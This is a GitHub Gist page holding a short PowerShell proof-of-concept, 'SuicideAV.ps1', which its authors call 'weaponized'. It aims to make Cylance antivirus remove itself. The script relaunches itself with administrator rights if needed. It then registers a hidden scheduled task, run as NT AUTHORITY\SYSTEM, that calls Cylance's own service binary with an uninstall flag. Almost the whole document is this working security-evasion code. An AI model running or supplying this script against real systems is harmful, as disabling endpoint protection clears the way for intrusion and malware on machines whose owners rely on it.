-
-
Save Graph-X/86ba7e7fe31c435005625354930ac5a5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SuicideAV.ps1 | |
| # Written by: RumTwinkies and Graph-X | |
| # | |
| # PoC script based on research done by Graph-X. Script written by RumTwinkies and weaponized by Graph-X | |
| # Make Cylance kill itself using its own service binary | |
| # Get the ID and security principal of the current user account | |
| $myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent() | |
| $myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID) | |
| # Get the security principal for the Administrator role | |
| $adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| # Check to see if we are currently running "as Administrator" | |
| if ($myWindowsPrincipal.IsInRole($adminRole)) | |
| { | |
| # We are running "as Administrator" - so change the title and background color to indicate this | |
| $Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)" | |
| $Host.UI.RawUI.BackgroundColor = "DarkBlue" | |
| clear-host | |
| } | |
| else | |
| { | |
| # We are not running "as Administrator" - so relaunch as administrator | |
| # Create a new process object that starts PowerShell | |
| $newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell"; | |
| # Specify the current script path and name as a parameter | |
| $newProcess.Arguments = $myInvocation.MyCommand.Definition; | |
| # Indicate that the process should be elevated | |
| $newProcess.Verb = "runas"; | |
| # Start the new process | |
| [System.Diagnostics.Process]::Start($newProcess); | |
| # Exit from the current, unelevated, process | |
| exit | |
| } | |
| $taskname = "Suicide-AV" | |
| $taskdescription = "Suicide-AV" | |
| #this command is where the evil happens | |
| $action = New-ScheduledTaskAction -Execute 'C:\Program Files\Cylance\Desktop\CylanceSVC.exe' -Argument '-u' | |
| #trigger the task 3 seconds into the future | |
| $trigger = New-ScheduledTaskTrigger -Once -At (get-date).AddSeconds(3) | |
| #hide the task | |
| $settings = New-ScheduledTaskSettingsSet -Hidden | |
| #register the task with the Task Scheduler to run as system. | |
| Register-ScheduledTask -Action $action -Trigger $trigger -TaskName $taskname -Description $taskdescription -User "NT AUTHORITY\SYSTEM" -RunLevel Highest -Settings $settings |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment